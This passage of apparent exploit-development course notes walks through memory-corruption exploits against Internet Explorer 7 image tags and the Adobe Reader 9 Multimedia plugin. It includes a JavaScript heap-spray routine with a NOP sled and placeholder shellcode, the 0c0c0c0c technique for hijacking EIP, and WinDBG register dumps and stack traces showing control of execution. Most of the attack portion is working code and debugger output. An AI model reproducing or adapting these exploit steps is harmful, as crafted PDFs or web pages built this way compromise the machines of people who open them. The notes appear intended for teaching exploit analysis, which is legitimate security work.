  3383. 025445a0 4141ffff 00420042 00420042 00420042
  3384. 025445b0 00420042 00420042 00420042 00420042
  3385. 025445c0 00420042 00420042 00420042 00420042
  3386. 025445d0 00420042 00000042 e8b9ce43 ff080100
  3387.  
  3388. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
  3389.  
  3390. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3391. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3392. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3393. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3394. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3395. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3396. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3397. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3398. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  3399. :
  3400. :
  3401.  
  3402. EAX register ends up pointing to one of these src values
  3403. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
  3404.  
  3405. EAX points to ---> 4141ffff B B B B B B ...
  3406. mov ecx, [eax]
  3407. - what will ecx be? ECX = 4141ffff
  3408. push eax
  3409. call dword ptr [ecx+4]
  3410. - EIP will jump to whatever is at memory location 4141ffff+4 = 41420003
  3411.  
  3412. ie7imgtag1.html
  3413. ---------------
  3414.  
  3415. var buf = unescape("%u0606%u0606BBBBBBBBBBBBBBBBBBBBBBBBB");
  3416.  
  3417. EAX points to ---> 0606ffff B B B B B B ...
  3418. mov ecx, [eax]
  3419. - ecx = 0606ffff
  3420.  
  3421. call [ecx+4]
  3422. - call [06070003]
  3423.  
  3424. Do we control the memory at 06070003?
  3425.  
  3426. dd 04040404 ........ 90 90 90 90 90 90 90
  3427. dd 05050505 ........ 90 90 90 90 90 90 90
  3428. dd 06060606 ........ 90 90 90 90 90 90 90
  3429.  
  3430. 06070003 --> 90909090
  3431.  
  3432. dd 07070707 ........ 90 90 90 90 90 90 90
  3433.  
  3434. EIP = 90909090 (whatever is stored at location 06070003)
  3435.  
  3436.  
  3437.  
  3438.  
  3439.  
  3440.  
  3441. ################
  3442. # PDF EXPLOITS #
  3443. ################
  3444.  
  3445. mnp0.pdf
  3446.  
  3447. - Open up acrobat reader
  3448. - WinDBG
  3449. - F6 attach to AcroRd32.exe
  3450. - g to Go
  3451.  
  3452. EIP = 41414141
  3453.  
  3454. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  3455.  
  3456. mnp1.pdf
  3457.  
  3458. All we are doing is changing EIP to 0c0c0c0c.
  3459. There is no heap spray in this one.
  3460.  
  3461. This exception may be expected and handled.
  3462. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  3463. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  3464. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  3465. 0c0c0c0c ?? ???
  3466.  
  3467. We know we get EIP control
  3468.  
  3469. mnp2.pdf
  3470.  
  3471. Put in the heap spray.
  3472.  
  3473. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  3474.  
  3475. var nops = unescape("%u9090%u9090");
  3476.  
  3477. while(nops.length <= 32768)
  3478. nops += nops;
  3479. nops = nops.substring(0,32768 - shellcode.length);
  3480.  
  3481. memory = new Array();
  3482.  
  3483. for(i = 0; i < 1500; i++) {
  3484. memory[i] = nops + shellcode;
  3485. }
  3486.  
  3487. 1500 NOP+shellcode blocks of 32K NOPs each
  3488.  
  3489. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  3490.  
  3491. We want to see what led to the crash.
  3492.  
  3493. EIP is invalid, so we can't disassemble around EIP
  3494.  
  3495. We need to trace the function that called us and crashed.
  3496. - STACK TRACE
  3497. - Dumps all the frames from the top of the stack.
  3498. - show you the series of calls that led up to the crash.
  3499. - we will analyze the topmost function on the frame.
  3500.  
  3501. WinDBG - stack trace - "k" command
  3502.  
  3503. 0:000> k
  3504. ChildEBP RetAddr
  3505. WARNING: Frame IP not in any known module. Following frames may be wrong.
  3506. 0013fb34 2d843117 0x90909090
  3507. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  3508. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  3509. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  3510. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  3511. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  3512. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  3513. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  3514. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  3515. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  3516. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  3517. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  3518. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  3519. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  3520. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  3521. 0013ffc0 7c817067 AcroRd32+0x4004
  3522. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  3523.  
  3524. 2d843117 -- the return address that we would have returned to, if we didnt crash.
  3525. address 2d843117-2 we will have a CALL instruction.
  3526.  
  3527. u 2d843117
  3528. u 2d843117-2
  3529. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  3530. u 2d843117-4
  3531.  
  3532. 0:000> u 2d843117-3
  3533. Multimedia!PlugInMain+0x41b66:
  3534. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  3535. 2d843117 6a00 push 0
  3536. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  3537. 2d84311e 56 push esi
  3538. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  3539. 2d843124 83c40c add esp,0Ch
  3540. 2d843127 66b80100 mov ax,1
  3541. 2d84312b 5e pop esi
  3542.  
  3543. We control EDX
  3544. edx=0c0c0c0c
  3545.  
  3546. call [edx+4] = call [0c0c0c10]
  3547. dd edx+4
  3548.  
  3549. 0:000> dd edx+4
  3550. 0c0c0c10 90909090 90909090 90909090 90909090
  3551. 0c0c0c20 90909090 90909090 90909090 90909090
  3552.  
  3553. 0:000> u 2d843117-7
  3554. Multimedia!PlugInMain+0x41b62:
  3555. 2d843110 8b10 mov edx,dword ptr [eax]
  3556. 2d843112 8bc8 mov ecx,eax
  3557. 2d843114 ff5204 call dword ptr [edx+4]
  3558.  
  3559. dd eax
  3560.  
  3561. 0:000> dd eax
  3562. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  3563. 02e2d690 42424242 42424242 42424242 42424242
  3564. 02e2d6a0 42424242 42424242 42424242 42424242
  3565. 02e2d6b0 42424242 42424242 42424242 42424242
  3566. 02e2d6c0 42424242 42424242 00000000 00000000
  3567.  
  3568. mnp3.pdf
  3569.  
  3570. change the NOPs 90909090 to 0c0c0c0c
  3571.  
  3572. mov edx, [eax]
  3573. call [edx+4]
  3574.  
  3575. edx = 0c0c0c0c
  3576. edx+4 = 0c0c0c10
  3577. contents at edx+4 will also be "0c0c0c0c"
  3578.  
  3579. EIP will jump to 0c0c0c0c
  3580.  
  3581. and...
  3582.  
  3583. 0:000> u 0c0c0c0c
  3584. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  3585. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  3586. 0c0c0c0c 0c0c or al,0Ch
  3587. 0c0c0c0e 0c0c or al,0Ch
  3588. 0c0c0c10 0c0c or al,0Ch
  3589. 0c0c0c12 0c0c or al,0Ch
  3590. 0c0c0c14 0c0c or al,0Ch
Add Comment
Please, Sign In to add comment